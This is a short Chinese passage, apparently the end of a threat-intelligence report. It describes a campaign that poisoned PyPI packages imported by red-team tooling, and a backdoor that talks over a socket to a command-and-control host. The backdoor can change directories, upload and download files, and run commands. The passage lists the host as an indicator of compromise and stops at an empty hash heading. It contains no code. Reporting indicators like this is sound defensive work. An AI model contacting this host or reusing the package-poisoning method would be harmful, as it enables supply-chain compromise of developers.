一名2022.11月到12月恢复活跃的专门针对红队的钓鱼人员或者某个组织，通过投毒PYPI依赖库，再发布后处理免杀项目及其他红队项目进行导入依赖，经过七层中转的加密代码，最终与blazywound.ignorelist.co:5008进行socket通信进行上线机器，后门实际拥有的功能为: 切换工作目录、上传文件、下载文件、任意命令执行。

0x04 IOC

Host

blazywound.ignorelist.co:5008

Hash